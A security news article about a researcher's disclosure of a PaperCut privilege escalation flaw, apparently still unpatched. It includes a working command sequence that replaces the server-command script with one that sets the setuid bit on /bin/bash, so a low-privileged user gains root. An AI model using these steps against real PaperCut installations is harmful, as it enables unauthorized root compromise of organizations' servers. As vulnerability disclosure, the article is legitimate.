Researcher Details Unpatch Papercut Privilege Escalation Vulnerability

Papercut Privilege Escalation

In the interconnected world of software and cybersecurity, even the most seemingly innocuous applications can harbor dangerous vulnerabilities. This is the story of Papercut, a widely used printing management software, and how a security researcher uncovered a critical flaw that could turn a lowly printer into a stepping stone for hackers.

Martin Mielke, a security researcher, was probing the latest version of Papercut (version 22.0.12) installed on an Ubuntu 22.04 system. Papercut, a software compatible with major brands and platforms, is a mainstay in organizations worldwide. It’s a vital cog in the printing operations of large companies, state organizations, and educational institutes, serving hundreds of millions across over 100 countries.

Papercut Privilege Escalation

Mielke’s installation was unassuming, utilizing a low-privileged user account named ‘papercut’. The crux of the issue lay in how Papercut handled certain web application functionalities. Mielke discovered that by accessing the application admin panel via port 9191 and navigating to a specific page, he could execute commands as the root user, despite being logged in with limited privileges.

This privilege escalation was possible due to a flaw in the execution of a script (`/bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key`). The script, residing in the directory of the ‘papercut’ user, could be replaced with any binary or shell script, allowing Mielke to execute arbitrary commands with root privileges.

To exploit this vulnerability, Mielke replaced the ‘server-command’ file with a script that altered the permissions of the bash shell, granting it setuid permissions. By doing so, any command run through the bash shell would execute with root privileges, effectively elevating the rights of the low-privileged ‘papercut’ user to that of the root user.

To execute the attack, run the following commands as the low-privileged “papercut” user:

papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command

#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#

. `dirname $0`/.common

export CLASSPATH
${JRE_HOME}/bin/java \
-Djava.io.tmpdir=${TMP_DIR} \
-Dserver.home=${SERVER_HOME} \
-Djava.awt.headless=true \
-Djava.locale.providers=COMPAT,SPI \
-Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
-Xverify:none \
biz.papercut.pcng.server.ServerCommand \
"$@"

papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command

papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash

Confirm root privileges:

The implications of this discovery were alarming. Not only did it highlight a significant oversight in Papercut’s security architecture, but it also underscored the potential risks associated with seemingly benign software components. The vulnerability, reported six months prior, remained unaddressed in the latest version (23.0.3), raising concerns about the pace of security updates in critical software.